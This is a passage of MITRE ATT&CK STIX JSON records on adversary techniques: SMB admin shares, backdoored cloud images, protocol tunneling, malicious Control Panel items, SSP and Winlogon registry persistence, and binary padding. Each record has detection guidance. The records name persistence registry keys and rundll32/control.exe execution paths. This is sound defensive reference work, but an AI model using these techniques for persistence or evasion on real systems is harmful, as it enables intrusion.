command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "created": "2020-02-11T18:25:28.212Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/002", "external_id": "T1021.002"}, {"source_name": "Medium Detecting WMI Persistence", "description": "French, D. (2018, October 9). Detecting & Removing an Attacker\u2019s WMI Persistence. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96"}, {"source_name": "TechNet RPC", "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx"}, {"source_name": "Microsoft Admin Shares", "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", "url": "http://support.microsoft.com/kb/314984"}, {"source_name": "Windows Event Forwarding Payne", "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem"}, {"source_name": "Lateral Movement Payne", "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts"}, {"source_name": "Wikipedia Server Message Block", "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.", "url": "https://en.wikipedia.org/wiki/Server_Message_Block"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Implant Internal Image", "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim\u2019s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee", "Praetorian"], "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "Containers"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", "created": "2019-09-04T12:04:03.552Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1525", "external_id": "T1525"}, {"source_name": "Rhino Labs Cloud Image Backdoor Technique Sept 2019", "description": "Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", "url": "https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/"}, {"source_name": "Rhino Labs Cloud Backdoor September 2019", "description": "Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", "url": "https://github.com/RhinoSecurityLabs/ccat"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Protocol Tunneling", "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "created": "2020-03-15T16:03:39.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1572", "external_id": "T1572"}, {"source_name": "SSH Tunneling", "description": "SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.", "url": "https://www.ssh.com/ssh/tunneling"}, {"source_name": "BleepingComp Godlua JUL19", "description": "Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.", "url": "https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Control Panel", "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ESET"], "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "created": "2020-01-23T19:59:52.630Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/002", "external_id": "T1218.002"}, {"source_name": "Microsoft Implementing CPL", "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx"}, {"source_name": "TrendMicro CPL Malware Jan 2014", "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"}, {"source_name": "TrendMicro CPL Malware Dec 2013", "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/"}, {"source_name": "Palo Alto Reaver Nov 2017", "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"}, {"source_name": "ESET InvisiMole June 2020", "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Network Address Translation Traversal", "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device\u2019s configuration to determine if any unintended NAT rules have been added without authorization.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "created": "2020-10-19T16:48:08.241Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1599/001", "external_id": "T1599.001"}, {"source_name": "RFC1918", "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.", "url": "https://tools.ietf.org/html/rfc1918"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-20T20:16:32.599Z", "name": "Upload Tool", "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", "created": "2021-03-17T20:31:07.828Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/002", "external_id": "T1608.002"}, {"source_name": "Dell TG-3390", "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"}, {"source_name": "Malwarebytes Heroku Skimmers", "description": "J\u00e9r\u00f4me Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", "url": "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku"}, {"source_name": "Dragos Heroku Watering Hole", "description": "Kent Backman. (2021, May 18). When Intrusions Don\u2019t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.", "url": "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/"}, {"source_name": "Intezer App Service Phishing", "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.", "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Security Support Provider", "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "created": "2020-01-24T17:16:11.806Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/005", "external_id": "T1547.005"}, {"source_name": "Graeber 2014", "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"}, {"source_name": "Microsoft Configure LSA", "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Data Historian Compromise", "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Joe Slowik - Dragos"], "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0810", "external_id": "T0810"}, {"source_name": "Industroyer - Dragos - 201810", "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Winlogon Helper DLL", "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", "created": "2017-05-31T21:30:20.148Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1004", "external_id": "T1004"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/579.html", "external_id": "CAPEC-579"}, {"source_name": "Cylance Reg Persistence Sept 2013", "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Binary Padding", "description": "Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.\n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Martin Jirkal, ESET"], "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. \n\nWhen executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Signature-based detection", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", "created": "2017-05-31T21:30:22.096Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1009", "external_id": "T1009"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/572.html", "external_id": "CAPEC-572"}, {"source_name": "ESET OceanLotus", "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"}, {"source_name": "Securelist Malware Tricks April 2017", "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", "url": 